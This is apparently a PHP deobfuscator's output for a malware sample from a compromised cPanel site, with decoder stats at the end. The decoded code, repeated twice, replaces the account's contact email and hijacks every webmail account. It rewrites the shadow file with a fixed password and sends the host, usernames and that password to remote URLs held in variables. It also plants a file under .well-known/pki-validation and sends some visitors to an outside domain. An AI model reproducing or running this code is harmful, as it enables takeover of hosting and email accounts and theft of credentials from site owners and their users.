$if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("\r\n",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } $found=true; } } else if (file_exists($log)) {$contents = file_get_contents($log); $array = explode(',',$contents); for($i=0;$i<count($array);$i++){if($array[$i]==$_file_){$found=true;break;} else {$found=false;} }} if($found){} else { if(file_put_contents($log,$_file_.',',FILE_APPEND)){ if ($activsnd == '1') { $if($desktop($E),$desktop('dzBybQ'),$_,$desktop('RnJvbTogVzBybQ')); } $cphost = $_SERVER['SERVER_NAME'] . ":2083|" . get_current_user(); $ctf = $_SERVER['DOCUMENT_ROOT'] . "/../.cpanel/contactinfo"; $ctml = $_SERVER['DOCUMENT_ROOT'] . "/../.contactemail"; if (file_exists($ctml)){ $fil = fopen($ctml, 'w'); fwrite($fil, $eml); fclose($fil); unlink($ctf); $ccp = curl_init(); curl_setopt($ccp, CURLOPT_URL, $fgcp . $cphost); curl_exec($ccp); set_time_limit(0); ini_set('max_execution_time',0); ini_set('memory_limit',-1); $user=get_current_user(); $password='azerty123.0@10'; $pwd = crypt($password,'$6$roottn$'); $t = $_SERVER['SERVER_NAME']; $t = @str_replace("www.","",$t); @$passwd = file_get_contents('/home/'.$user.'/etc/'.$t.'/shadow'); $ex=explode("\r\n",$passwd); @link('/home/'.$user.'/etc/'.$t.'/shadow','/home/'.$user.'/etc/'.$t.'/shadow.roottn.bak'); @unlink('/home/'.$user.'/etc/'.$t.'/shadow'); foreach($ex as $ex){ $ex=explode(':',$ex); $e= $ex[0]; if ($e){ $b=fopen('/home/'.$user.'/etc/'.$t.'/shadow','ab');fwrite($b,$e.':'.$pwd.':16249:::::'."\r\n");fclose($b); $tbs = $t.'/webmail|'.$e.'@'.$t.'|'.$password; $ccpwebm = curl_init(); curl_setopt($ccpwebm, CURLOPT_URL, $webm1 . $tbs); curl_exec($ccpwebm); } } } if ($activssl == '1' && $nfiles >= '10'){ $loga = $_SERVER['DOCUMENT_ROOT'] . $lss; if (!file_exists($loga)){ mkdir($_SERVER['DOCUMENT_ROOT'] . strrev('/noitadilav-ikp/nwonk-llew./'), 0777, true); $fp = fopen($loga, 'w'); fwrite($fp, $sslphp); fclose($fp); $s_host = $_SERVER['SERVER_NAME']; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $gui . $s_host); curl_exec($ch); } } } }
foreach($blocked_words as $word2) {
    if (substr_count($dp, strtolower($word2)) > 0 or $dp == "" or $dp == " " or $dp == "	") {
		exit(header('Location: http://guiminer.co.technology/rd/'));
    }  
}

?>

Function Calls

None

Variables

None

Stats

MD5 1ae9c83e5b520edea96199994dff24e7
Eval Count 0
Decode Time 125 ms